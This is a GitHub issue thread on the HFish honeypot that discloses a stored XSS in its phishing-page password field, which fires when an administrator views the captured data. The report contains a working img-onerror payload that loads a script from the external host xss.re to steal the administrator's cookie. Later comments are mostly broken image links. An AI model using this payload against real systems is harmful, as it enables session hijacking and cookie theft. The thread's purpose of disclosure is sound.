### ISSUE TITLE
XSS exists in the information,can get cookie

### ISSUE THREAD

**Issue by Assassins-white** [hacklcx/HFish#69]
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.

Insert XSS payload where the password is entered
![image](https://user-images.githubusercontent.com/39295496/76696266-6443a780-66c4-11ea-9ebd-53c834412a67.png)
XSS code is triggered when the administrator views the information
![image](https://user-images.githubusercontent.com/39295496/76695974-9f43dc00-66c0-11ea-8229-c2a94608cb27.png)
Use the following code to get a cookie.
`<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">`
![image](https://user-images.githubusercontent.com/39295496/76696017-94d61200-66c1-11ea-9223-d6bb15fd8758.png)

**Comment by sanjinhub** [comment]
收到，等新版本

**Comment by MohandSadakah** [comment]
](https://github.com/hacklcx/HFish/assets/47220452/962a3ea4-add5-47b5-98f9-c6c1f10cb093)

**Comment by MohandSadakah** [comment]
(https://github.com/hacklcx/HFish/assets/47220452/ea5254cd-adc2-43d9-a25c-38126c06048c)

**Comment by MohandSadakah** [comment]
[XSS](https://github.com/hacklcx/HFish/assets/47220452/86552063-8043-40d7-bf0d-49d6ddfdc097)

**Comment by MohandSadakah** [comment]
(https://github.com/hacklcx/HFish/assets/47220452/4bf2f953-065d-4ae9-81e8-d6e3239baec9)

**Comment by MohandSadakah** [comment]
![XSS](https://github.com/hacklcx/HFish/assets/47220452/0d84525c-b578-476d-ba2f-abb8bde489eb)

**Comment by MohandSadakah** [comment]
[xss.pdf](https://github.com/hacklcx/HFish/files/15449314/xss.pdf)

**Comment by MohandSadakah** [comment]
#167

**Comment by MohandSadakah** [comment]
> ![XSS](https://github.com/47220452/333916452-0d84525c-b578-476d-ba2f-abb8bde489eb.svg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTY3NjU1NDcsIm5iZiI6MTcxNjc2NTI0NywicGF0aCI6Ii80NzIyMDQ1Mi8zMzM5MTY0NTItMGQ4NDUyNWMtYjU3OC00NzZkLWJhMmYtYWJiOGJkZTQ4OWViLnN2Zz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA1MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNTI2VDIzMTQwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTk4YTI2ZWI4NmU3OWYyNDZmNzIwMzc3NWU4YmI1ZGFlOWNkODM3M2VlMGNhM2Y4MGM1NTIyZmI2Mjc3ZTVhMDMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.eJ6kbOMzkI4RjxPvpadIuZt7kL4e3ZMV7W2ujPK5lMo)

**Comment by MohandSadakah** [comment]
](https://github.com/hacklcx/HFish/assets/47220452/c5fb3882-86d7-4b31-81d2-bdb9d085e3c0)

**Comment by MohandSadakah** [comment]
![xss-image(https://github.com/hacklcx/HFish/assets/47220452/4655dd55-198e-4c8b-808e-75131d8d2265)]
